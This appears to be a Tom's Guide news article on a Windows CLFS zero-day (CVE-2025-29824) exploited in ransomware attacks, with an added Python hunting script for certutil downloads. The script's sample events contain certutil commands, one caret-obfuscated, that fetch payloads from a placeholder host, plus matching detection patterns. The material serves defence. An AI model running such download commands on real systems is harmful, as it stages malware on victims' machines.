Windows PCs under threat from zero-day flaw used in ransomware attacks — update your computer right now


Of the 134 Windows security flaws fixed by Microsoft in yesterday’s Patch Tuesday updates, only one was a zero-day flaw that could potentially be exploited by hackers to gain system privileges.

Today though, Microsoft has said that flaw (tracked as CVE-2025-29824) has indeed been used as a zero-day exploit in targeted ransomware attacks.

Since it has now been patched, it is of critical importance that Windows users download and install this update immediately to protect their systems. Though the attacks were aimed at a small number of international targets, including the IT and real estate sectors in the United States, financial institutions in Venezuela, a software company in Spain and the retail sector in Saudi Arabia, any unpatched system is vulnerable.

This zero-day flaw is a privilege escalation bug in the Windows Common Log File System that can be exploited in order to achieve SYSTEM privileges. The Hacker News explains that hackers value these types of exploits specifically because they can enable privileged access for widespread deployment and be used to infect vulnerable PCs with ransomware.

The threat actors have leveraged a malware named PipeMagic to deliver both the exploits and the ransomware payloads; this is the second Windows zero-day flaw to be delivered via this malware. The first one (tracked as CVE-2025-24983) was also a privilege escalation bug, but for the Win32 Kernel Subsystem. That vulnerability was flagged by ESET and patched by Microsoft last month.

While it is currently unknown how the attackers are gaining initial access, it does seem as though the threat actors behind the attacks have been using the certutil utility to download the malware from a compromised third-party site that is being used to stage payloads. Microsoft is tracking the activity and post-compromise exploitation of this zero-day under the name Storm-2460.
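Defenders can hunt for the certutil download behavior described above in process-creation telemetry. The following is an added example, not code from Microsoft or this article: the events are constructed and shaped like Sysmon Event ID 1 records, `staging.example` is a placeholder host, and the switch list is an assumption, since the article does not say which certutil options were used.

```python
import re

# Constructed process-creation events, shaped like Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://staging.example/a.bin C:\Users\Public\a.bin"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil.exe -hashfile C:\Temp\setup.msi SHA256"},
    {"Image": r"C:\Users\Public\cu.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": 'cu.exe /VerifyCTL /f "https://staging.example/b.dat"'},
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": "cmd /c cer^tutil -url^cache -f http://staging.example/c.bin c.bin"},
]

URL_RE = re.compile(r"(?:https?|ftp)://[^\s\"']+", re.I)
# Assumption: certutil verbs that accept a URL; the article names no switches.
FETCH_SWITCH_RE = re.compile(r"(?<!\S)[-/](urlcache|verifyctl|url)(?!\w)", re.I)
CERTUTIL_RE = re.compile(r"(?<![\w.])certutil(?:\.exe)?(?![\w.])", re.I)


def analyze(event):
    """Return a finding dict if the event looks like a certutil download, else None."""
    # cmd.exe discards carets, so strip them (and quotes) before matching.
    cmdline = event.get("CommandLine", "").replace("^", "").replace('"', "")
    image_name = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()
    by_metadata = original == "certutil.exe" or image_name == "certutil.exe"
    if not (by_metadata or CERTUTIL_RE.search(cmdline)):
        return None
    switches = sorted({m.lower() for m in FETCH_SWITCH_RE.findall(cmdline)})
    urls = URL_RE.findall(cmdline)
    if not (switches and urls):
        return None  # e.g. -hashfile or certificate-store work: not a download
    reasons = ["fetch switch: " + ", ".join(switches)]
    if original == "certutil.exe" and image_name != "certutil.exe":
        reasons.append("certutil running under another file name")
    if "^" in event.get("CommandLine", ""):
        reasons.append("caret-obfuscated command line")
    return {"image": event.get("Image"), "urls": urls, "reasons": reasons}


def scan(events):
    return [finding for finding in map(analyze, events) if finding]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Requiring both a fetch switch and a URL keeps routine certutil use, such as hashing a file, out of the results.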

How to stay safe from malware and ransomware


Patch Tuesday falls on the second Tuesday of every month, so set a calendar reminder so that you can remember to update your PC around that time. Outdated software is a great access point for hackers and threat actors, so don't leave yourself open to attacks by neglecting to install serious updates. Likewise, you can also remind yourself to set up automated updates and scans for your security software, since you should of course have one of the best antivirus programs installed on your PC too.

Since Windows Defender is built into Windows, you can use it to periodically scan your system for malware or viruses too. And obviously, you want to practice safe browsing habits online. You can see if your antivirus security suite comes with a hardened browser or VPN feature for an added layer of security, but whatever you do, never click on links, attachments or downloads from unexpected senders or unknown sources. Only download apps and software from trusted app stores and developers, and know how to recognize common phishing techniques.

Zero-day flaws provide an easy way for hackers and other cybercriminals to gain a foothold for their attacks and this is why knowledge of them sells for such a high price. Unfortunately though, the only thing you can do to stay safe from attacks exploiting them is to install security updates as soon as they become available and to practice good cyber hygiene online.

Amber Bouman
Senior Editor Security

Amber Bouman is the senior security editor at Tom's Guide where she writes about antivirus software, home security, identity theft and more. She has long had an interest in personal security, both online and off, and also has an appreciation for martial arts and edged weapons. With over two decades of experience working in tech journalism, Amber has written for a number of publications including PC World, Maximum PC, Tech Hive, and Engadget covering everything from smartphones to smart breast pumps. 
